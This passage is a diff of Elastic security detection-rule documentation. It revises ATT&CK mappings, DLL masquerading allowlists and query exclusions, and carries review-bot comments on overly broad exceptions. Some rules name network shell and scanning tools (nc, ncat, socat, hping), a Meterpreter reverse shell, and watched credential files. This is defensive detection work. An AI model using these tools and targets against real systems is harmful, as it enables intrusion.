"wsdproviderutil.dll", "wsdscanproxy.dll", "wsecedit.dll", "wsepno.dll", "wshbth.dll", "wshcon.dll", "wshelper.dll", "wshext.dll", "wshhyperv.dll", "wship6.dll", "wshqos.dll", "wshrm.dll", "wshtcpip.dll", "wshunix.dll", "wslapi.dll", "wsmagent.dll", "wsmauto.dll", "wsmplpxy.dll", "wsmres.dll", "wsmsvc.dll", "wsmwmipl.dll", "wsnmp32.dll", "wsock32.dll", "wsplib.dll", "wsp_fs.dll", "wsp_health.dll", "wsp_sr.dll", "wtsapi32.dll", "wuapi.dll", "wuaueng.dll", "wuceffects.dll", "wudfcoinstaller.dll", "wudfplatform.dll", "wudfsmcclassext.dll", "wudfx.dll", "wudfx02000.dll", "wudriver.dll", "wups.dll", "wups2.dll", "wuuhext.dll", "wuuhosdeployment.dll", "wvc.dll", "wwaapi.dll", "wwaext.dll", "wwanapi.dll", "wwancfg.dll", "wwanhc.dll", "wwanprotdim.dll", "wwanradiomanager.dll", "wwansvc.dll", "wwapi.dll", "xamltilerender.dll", "xaudio2_8.dll", "xaudio2_9.dll", "xblauthmanager.dll", "xblgamesave.dll", "xblgamesaveext.dll", "xblgamesaveproxy.dll", "xboxgipsvc.dll", "xboxgipsynthetic.dll", "xboxnetapisvc.dll", "xinput1_4.dll", "xinput9_1_0.dll", "xinputuap.dll", "xmlfilter.dll", "xmllite.dll", "xmlprovi.dll", "xolehlp.dll", "xpsgdiconverter.dll", "xpsprint.dll", "xpspushlayer.dll", "xpsrasterservice.dll", "xpsservices.dll", "xwizards.dll", "xwreg.dll", "xwtpdui.dll", "xwtpw32.dll", "zipcontainer.dll", "zipfldr.dll", "bootsvc.dll", "halextintcpsedma.dll", "icsvcvss.dll", "ieproxydesktop.dll", "lsaadt.dll", "nlansp_c.dll", "nrtapi.dll", "opencl.dll", "pfclient.dll", "pnpdiag.dll", "prxyqry.dll", "rdpnanotransport.dll", "servicingcommon.dll", "sortwindows63.dll", "sstpcfg.dll", "tdhres.dll", "umpodev.dll", "utcapi.dll", "windlp.dll", "wow64base.dll", "wow64con.dll", "blbuires.dll", "bpainst.dll", "cbclient.dll", "certadm.dll", "certocm.dll", "certpick.dll", "csdeployres.dll", "dsdeployres.dll", "eapa3hst.dll", "eapacfg.dll", "eapahost.dll", "elsext.dll", "encdump.dll", "escmigplugin.dll", "fsclient.dll", "fsdeployres.dll", "fssminst.dll", "fssmres.dll", "fssprov.dll", 
"ipamapi.dll", "kpssvc.dll", "lbfoadminlib.dll", "mintdh.dll", "mmci.dll", "mmcico.dll", "mprsnap.dll", "mstsmhst.dll", "mstsmmc.dll", "muxinst.dll", "personax.dll", "rassfm.dll", "rasuser.dll", "rdmsinst.dll", "rdmsres.dll", "rtrfiltr.dll", "sacsvr.dll", "scrdenrl.dll", "sdclient.dll", "sharedstartmodel.dll", "smsrouter.dll", "spwizimg_svr.dll", "sqlcecompact40.dll", "sqlceoledb40.dll", "sqlceqp40.dll", "sqlcese40.dll", "srvmgrinst.dll", "svrmgrnc.dll", "tapisnap.dll", "tlsbrand.dll", "tsec.dll", "tsprop.dll", "tspubiconhelper.dll", "tssdjet.dll", "tsuserex.dll", "ualapi.dll", "ualsvc.dll", "umcres.dll", "updatehandlers.dll", "usocore.dll", "vssui.dll", "wsbappres.dll", "wsbonline.dll", "wsmselpl.dll", "wsmselrr.dll", "xpsfilt.dll", "xpsshhdr.dll" ) and not ( - (dll.name : "icuuc.dll" and dll.code_signature.subject_name == "Valve" and dll.code_signature.trusted == true) or - (dll.name : "dbghelp.dll" and dll.code_signature.trusted == true) or + ( + dll.name : "icuuc.dll" and dll.code_signature.subject_name in ( + "Valve", "Valve Corp.", "Avanquest Software (7270356 Canada Inc)", "Adobe Inc." + ) and dll.code_signature.trusted == true + ) or + ( + dll.name : ("timeSync.dll", "appInfo.dll") and dll.code_signature.subject_name in ( + "VMware Inc.", "VMware, Inc." 
+ ) and dll.code_signature.trusted == true + ) or + ( + dll.name : "libcrypto.dll" and dll.code_signature.subject_name in ( + "NoMachine S.a.r.l.", "Bitdefender SRL", "Oculus VR, LLC" + ) and dll.code_signature.trusted == true + ) or + ( + dll.name : "ucrtbase.dll" and dll.code_signature.subject_name in ( + "Proofpoint, Inc.", "Rapid7 LLC", "Eclipse.org Foundation, Inc.", "Amazon.com Services LLC", "Windows Phone" + ) and dll.code_signature.trusted == true + ) or + (dll.name : "ICMP.dll" and dll.code_signature.subject_name == "Paessler AG" and dll.code_signature.trusted == true) or + (dll.name : "kerberos.dll" and dll.code_signature.subject_name == "Bitdefender SRL" and dll.code_signature.trusted == true) or + (dll.name : "dbghelp.dll" and dll.code_signature.trusted == true) or (dll.name : "DirectML.dll" and dll.code_signature.subject_name == "Adobe Inc." and dll.code_signature.trusted == true) or ( dll.path : ( @@ -95,3 +119,31 @@ library where event.action == "load" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Search Order Hijacking +** ID: T1574.001 +** Reference URL: https://attack.mitre.org/techniques/T1574/001/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ 
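Review bot: the new entries in the `and not (` exclusion block are keyed only on `dll.name` plus `dll.code_signature.subject_name in (...)` and `dll.code_signature.trusted == true`, with no path constraint, so a trusted binary from any listed publisher loading a DLL by that name from any location is excluded; the `ucrtbase.dll` entry alone now covers five publishers ("Proofpoint, Inc.", "Rapid7 LLC", "Eclipse.org Foundation, Inc.", "Amazon.com Services LLC", "Windows Phone"), and `libcrypto.dll`, `kerberos.dll` and `ICMP.dll` get similar publisher-only carve-outs. Suggest recording where each exception came from (a comment or a line in the rule's false-positives section) so the allowlist can be pruned later, and scoping the broader ones to the product's install directory the way the existing `dll.path : (` branch that follows already does for other cases.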
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-executable.asciidoc index 7f64559b45..e3d6658c06 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-executable.asciidoc @@ -28,9 +28,10 @@ Identifies suspicious instances of default system32 executables, either unsigned * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -83,3 +84,19 @@ process where event.type == "start" and process.code_signature.status : "*" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-vlc-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-vlc-dll.asciidoc index e0c51d2a26..9043e553ec 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-vlc-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-vlc-dll.asciidoc 
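Review bot: the second hunk of potential-masquerading-as-system32-executable.asciidoc maps the rule to Persistence (TA0003) and Compromise Client Software Binary (T1554), but the visible description ("Identifies suspicious instances of default system32 executables, either unsigned...") only talks about masquerading, so the page never says why an unsigned or mis-signed system32 binary is evidence of persistence. Suggest adding one sentence to the description or investigation guide giving that rationale, so the new mapping is not just a tag. The `* Tactic: Persistence` tag and the `*Version*: 1` to `2` bump in the first hunk are consistent with the new threat entries.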
@@ -28,9 +28,10 @@ Identifies instances of VLC-related DLLs which are not signed by the original de * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -63,3 +64,19 @@ library where host.os.type == "windows" and event.action == "load" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-meterpreter-reverse-shell.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-meterpreter-reverse-shell.asciidoc index 23d3115954..1209c36c25 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-meterpreter-reverse-shell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-meterpreter-reverse-shell.asciidoc @@ -29,7 +29,7 @@ This detection rule identifies a sample of suspicious Linux system file reads us * Use Case: Threat Detection * Tactic: Execution -*Version*: 1 +*Version*: 2 *Rule authors*: 
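Review bot: the second hunk of potential-masquerading-as-vlc-dll.asciidoc adds the sub-technique Invalid Code Signature (T1036.001), but the description says the rule identifies VLC-related DLLs "which are not signed by the original de[veloper]", which also covers a DLL that carries a valid signature from a different publisher; that case is Match Legitimate Name or Location (T1036.005), not an invalid signature. Suggest checking the full `library where host.os.type == "windows" and event.action == "load" and` query for whether it tests signature validity or only the signer identity, and keeping T1036.001 only if the former is true, or stating in the description that both cases are covered.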
@@ -38,35 +38,6 @@ This detection rule identifies a sample of suspicious Linux system file reads us *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -## Setup -This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. - -``` -Kibana --> -Management --> -Integrations --> -Auditd Manager --> -Add Auditd Manager -``` - -`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. - -For this detection rule to trigger, the following additional audit rules are required to be added to the integration: - -``` --w /proc/net/ -p r -k audit_proc --w /etc/machine-id -p wa -k machineid --w /etc/passwd -p wa -k passwd -``` - -Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-network-scan-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-network-scan-detected.asciidoc index a50a8507b5..db0d08cccf 100644 
--- a/docs/detections/prebuilt-rules/rule-details/potential-network-scan-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-network-scan-detected.asciidoc @@ -21,7 +21,7 @@ This rule identifies a potential port scan. A port scan is a method utilized by *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 5 *References*: None @@ -32,7 +32,7 @@ This rule identifies a potential port scan. A port scan is a method utilized by * Tactic: Reconnaissance * Use Case: Network Security Monitoring -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-network-scan-executed-from-host.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-network-scan-executed-from-host.asciidoc new file mode 100644 index 0000000000..eccb5c9b09 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-network-scan-executed-from-host.asciidoc 
@@ -0,0 +1,60 @@ +[[potential-network-scan-executed-from-host]] +=== Potential Network Scan Executed From Host + +This threshold rule monitors for the rapid execution of unix utilities that are capable of conducting network scans. Adversaries may leverage built-in tools such as ping, netcat or socat to execute ping sweeps across the network while attempting to evade detection or due to the lack of network mapping tools available on the compromised host. + +*Rule type*: threshold + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.action:exec and event.type:start and +process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat or socat) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-network-share-discovery.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-network-share-discovery.asciidoc index f40806d727..9e32f1ee60 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-network-share-discovery.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-network-share-discovery.asciidoc 
@@ -29,9 +29,10 @@ Adversaries may look for folders and drives shared on remote systems to identify * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Collection * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -65,3 +66,11 @@ sequence by user.name, source.port, source.ip with maxspan=15s ** Name: Network Share Discovery ** ID: T1135 ** Reference URL: https://attack.mitre.org/techniques/T1135/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-network-sweep-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-network-sweep-detected.asciidoc index ef3af53347..1e4be4e957 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-network-sweep-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-network-sweep-detected.asciidoc @@ -21,7 +21,7 @@ This rule identifies a potential network sweep. A network sweep is a method use *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 5 *References*: None @@ -32,7 +32,7 @@ This rule identifies a potential network sweep. A network sweep is a method use * Tactic: Reconnaissance * Use Case: Network Security Monitoring -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-non-standard-port-ssh-connection.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-non-standard-port-ssh-connection.asciidoc index 100c6eea24..f3c4e345f7 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-non-standard-port-ssh-connection.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/potential-non-standard-port-ssh-connection.asciidoc @@ -32,7 +32,7 @@ Identifies potentially malicious processes communicating via a port paring typic * OS: macOS * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -47,13 +47,14 @@ Identifies potentially malicious processes communicating via a port paring typic [source, js] ---------------------------------- sequence by process.entity_id with maxspan=1m -[process where event.action == "exec" and process.name:"ssh"] -[network where process.name:"ssh" - and event.action in ("connection_attempted", "connection_accepted") - and destination.port != 22 - and destination.ip != "127.0.0.1" - and network.transport: "tcp" -] + [process where event.action == "exec" and process.name:"ssh" and not process.parent.name in ( + "rsync", "pyznap", "git", "ansible-playbook", "scp", "pgbackrest", "git-lfs", "expect", "Sourcetree", "ssh-copy-id", + "run" + ) + ] + [network where process.name:"ssh" and event.action in ("connection_attempted", "connection_accepted") and + destination.port != 22 and destination.ip != "127.0.0.1" and network.transport: "tcp" + ] ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-openssh-backdoor-logging-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-openssh-backdoor-logging-activity.asciidoc index e978e8d829..f9d54cb388 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-openssh-backdoor-logging-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-openssh-backdoor-logging-activity.asciidoc @@ -36,7 +36,7 @@ Identifies a Secure Shell (SSH) client or server process creating or writing to * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -45,47 +45,6 @@ Identifies a Secure Shell (SSH) client or server process creating or writing to *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. 
-- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query 
@@ -93,7 +52,8 @@ For versions <8.2, you need to add a custom ingest pipeline to populate `event.i ---------------------------------- file where host.os.type == "linux" and event.type == "change" and process.executable : ("/usr/sbin/sshd", "/usr/bin/ssh") and ( - (file.name : (".*", "~*", "*~") and not file.name : (".cache", ".viminfo", ".bash_history")) or + (file.name : (".*", "~*", "*~") and not file.name : (".cache", ".viminfo", ".bash_history", ".google_authenticator", + ".jelenv", ".csvignore", ".rtreport")) or file.extension : ("in", "out", "ini", "h", "gz", "so", "sock", "sync", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9") or file.path : ( diff --git a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-init-d-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-init-d-detected.asciidoc index 3aa6e2cec6..f0ef21969a 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-init-d-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-init-d-detected.asciidoc @@ -36,7 +36,7 @@ Files that are placed in the /etc/init.d/ directory in Unix can be used to start * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -112,6 +112,7 @@ This rule looks for the creation of new files within the `/etc/init.d/` director - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-motd-file-creation-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-motd-file-creation-detected.asciidoc index 2211e84101..2a32dc7b3a 100644 
--- a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-motd-file-creation-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-motd-file-creation-detected.asciidoc @@ -34,7 +34,7 @@ Message of the day (MOTD) is the message that is presented to the user when a us * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -106,6 +106,7 @@ This rule identifies the creation of new files within the `/etc/update-motd.d/` - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -114,9 +115,9 @@ This rule identifies the creation of new files within the `/etc/update-motd.d/` [source, js] ---------------------------------- host.os.type :"linux" and event.action:("creation" or "file_create_event" or "rename" or "file_rename_event") and -file.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not -process.executable : ("/usr/bin/dpkg" or "/usr/bin/dockerd" or "/bin/rpm" or "/kaniko/executor") and not -file.extension : ("swp" or "swx") +file.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not process.name : ( + dpkg or dockerd or rpm or executor or dnf +) and not file.extension : ("swp" or "swpx") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-run-control-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-run-control-detected.asciidoc index d6d6d0a5f6..5e74c51b27 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-run-control-detected.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-run-control-detected.asciidoc @@ -36,7 +36,7 @@ This rule monitors the creation/alteration of the rc.local file by a previously * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -109,6 +109,7 @@ Detection alerts from this rule indicate the creation of a new `/etc/rc.local` f - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -118,7 +119,9 @@ Detection alerts from this rule indicate the creation of a new `/etc/rc.local` f ---------------------------------- host.os.type : "linux" and event.category : "file" and event.type : ("change" or "file_modify_event" or "creation" or "file_create_event") and -file.path : "/etc/rc.local" and not process.name : ("dockerd" or "docker" or "dnf" or "yum" or "rpm" or "dpkg") and not file.extension : ("swp" or "swx") +file.path : "/etc/rc.local" and not process.name : ( + "dockerd" or "docker" or "dnf" or "dnf-automatic" or "yum" or "rpm" or "dpkg" +) and not file.extension : ("swp" or "swpx") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-persistence-via-time-provider-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-persistence-via-time-provider-modification.asciidoc index 1fc7ba072e..dcbf3d4c07 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-persistence-via-time-provider-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-persistence-via-time-provider-modification.asciidoc 
@@ -30,10 +30,11 @@ Identifies modification of the Time Provider. Adversaries may establish persiste * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Privilege Escalation * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -70,3 +71,15 @@ registry where host.os.type == "windows" and event.type:"change" and ** Name: Time Providers ** ID: T1547.003 ** Reference URL: https://attack.mitre.org/techniques/T1547/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Time Providers +** ID: T1547.003 +** Reference URL: https://attack.mitre.org/techniques/T1547/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-port-monitor-or-print-processor-registration-abuse.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-port-monitor-or-print-processor-registration-abuse.asciidoc index b40670d77c..bb494539a7 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-port-monitor-or-print-processor-registration-abuse.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-port-monitor-or-print-processor-registration-abuse.asciidoc @@ -33,7 +33,7 @@ Identifies port monitor and print processor registry modifications. Adversaries * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -73,6 +73,10 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Port Monitors ** ID: T1547.010 ** Reference URL: https://attack.mitre.org/techniques/T1547/010/ +* Sub-technique: +** Name: Print Processors +** ID: T1547.012 +** Reference URL: https://attack.mitre.org/techniques/T1547/012/ * Tactic: ** Name: Persistence ** ID: TA0003 
@@ -85,3 +89,7 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Port Monitors ** ID: T1547.010 ** Reference URL: https://attack.mitre.org/techniques/T1547/010/ +* Sub-technique: +** Name: Print Processors +** ID: T1547.012 +** Reference URL: https://attack.mitre.org/techniques/T1547/012/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-through-writable-docker-socket.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-through-writable-docker-socket.asciidoc index 8821bd5f3b..e80d946606 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-through-writable-docker-socket.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-through-writable-docker-socket.asciidoc @@ -32,7 +32,7 @@ This rule monitors for the usage of Docker runtime sockets to escalate privilege * Domain: Container * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-container-misconfiguration.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-container-misconfiguration.asciidoc index a08c0d6204..0e62b862a2 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-container-misconfiguration.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-container-misconfiguration.asciidoc @@ -33,7 +33,7 @@ This rule monitors for the execution of processes that interact with Linux conta * Domain: Container * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-cve-2023-4911.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-cve-2023-4911.asciidoc index 40d29f3ec4..1b3a5411e9 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-cve-2023-4911.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-cve-2023-4911.asciidoc @@ -32,7 +32,7 @@ This rule detects potential privilege escalation attempts through Looney Tunable * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -41,28 +41,6 @@ This rule detects potential privilege escalation attempts through Looney Tunable *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -## Setup -Elastic Defend integration does not collect environment variable logging by default. -In order to capture this behavior, this rule requires a specific configuration option set within the advanced settings -of the Elastic Defend integration. -To set up environment variable capture for an Elastic Agent policy: -- Go to Security → Manage → Policies. -- Select an Elastic Agent policy. -- Click Show advanced settings. -- Scroll down or search for linux.advanced.capture_env_vars. -- Enter the names of env vars you want to capture, separated by commas. -- For this rule the 